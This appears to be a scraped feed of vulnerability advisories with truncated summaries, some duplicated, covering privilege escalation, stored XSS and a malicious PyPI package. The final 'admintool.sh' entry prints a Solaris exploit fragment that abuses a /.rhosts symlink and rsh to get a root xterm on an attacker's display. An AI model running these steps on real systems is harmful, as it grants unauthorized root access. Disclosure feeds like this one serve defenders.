CVE-2026-12673

Liquidfiles versions before 4.2.12 are affected by a broken access control vulnerability resulting in privilege escalation from an Admin in a secondary domain to a Sysadmin by modifying a group in their managed secondary non-default group...

CVE-2026-23752

GFI HelpDesk before 4.99.9 contains a stored cross-site scripting vulnerability in the template group creation and editing functionality that allows authenticated administrators to inject arbitrary JavaScript by manipulating the companyname POST parameter without HTML sanitization. Attackers can...

CVE-2026-48904

An improper access check allows privelege escalation through the comusers group editing webservice endpoint...

CVE-2026-48904

An improper access check allows privelege escalation through the comusers group editing webservice endpoint...

PT-2026-33820

GFI HelpDesk before 4.99.9 contains a stored cross-site scripting vulnerability in the template group creation and editing functionality that allows authenticated administrators to inject arbitrary JavaScript by manipulating the companyname POST parameter without HTML sanitization. Attackers can...

[20260514] - Core - Privilege escalation through com_users webservice endpoints

An improper access check allows privelege escalation through the comusers group editing webservice endpoint...

EUVD-2022-6817

Malicious code in bioql PyPI...

Design/Logic Flaw

DataHub is an open-source metadata platform. In affected versions a low privileged user could remove a user, edit group members, or edit another user's profile information. The default privileges gave too many broad permissions to low privileged users. These have been constrained in PR 9067 to...

admintool.sh

setenv DISPLAY yourdisplay:0.0 ln -s /.rhosts /tmp/.group.lock /usr/bin/admintool browse - group - edit a group - get an error message - exit echo "+ +" .rhosts /usr/bin/rsh localhost -l root "/usr/openwin/bin/xterm&"...